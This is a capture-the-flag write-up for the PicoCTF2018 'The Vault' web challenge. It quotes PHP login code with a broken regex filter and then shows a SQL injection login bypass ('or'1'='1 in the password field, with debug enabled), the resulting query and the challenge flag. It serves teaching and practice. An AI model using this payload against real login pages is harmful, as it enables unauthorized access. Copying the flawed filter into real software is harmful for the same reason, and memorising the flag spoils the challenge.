PicoCTF2018 – Web – The Vault

PicoCTF2018 – Web – The Vault

Objective:

There is a website running at http://2018shell.picoctf.com:64349 (link [1] ). Try to see if you can login!

Solution:

Ok this site is nice enough to give us the code for login.php

Looking in the code you can see there is an attempt to sanitize inputs using regular expressions

It creates a variable named pattern which is a regex used to match against the variables

//validation check

  $pattern ="/.*['\"].*OR.*/i";

  $user_match = preg_match($pattern, $username);

  $password_match = preg_match($pattern, $username);

  if($user_match + $password_match > 0)  {

    echo "<h1>SQLi detected.</h1>";

  }

  else {

    $result = $con->query($query);

    $row = $result->fetchArray();

   

    if ($row) {

      echo "<h1>Logged in!</h1>";

      echo "<p>Your flag is: $FLAG</p>";

    } else {

      echo "<h1>Login failed.</h1>";

    }

  }

 

?>

However this check doesn’t appear to be implemented correctly. I tried putting in OR ‘ and I never got the error about SQLi detected. Also if you look closely at the code it would never check the password because they used the wrong variable name for the password check, even if the regex worked

$password_match = preg_match($pattern, $username); ß-- Not $Password

Again, I loaded this up in Burpsuite and found the POST and loaded it up in repeater to quickly try some things. You can see in the POST there is also an option for debug change it to 1 and you get to see the actual SQL statement run

I just ran through adding things into the password field to add an OR with a statement that will validate as true

username=admin&password='or'1'='1&debug=1

This gave me the flag

HTTP/1.1 200 OK

Content-type: text/html; charset=UTF-8

<pre>username: admin

password: 'or'1'='1

SQL query: SELECT 1 FROM users WHERE name='admin' AND password=''or'1'='1'

</pre><h1>Logged in!</h1><p>Your flag is: picoCTF{w3lc0m3_t0_th3_vau1t_e4ca2258}</p>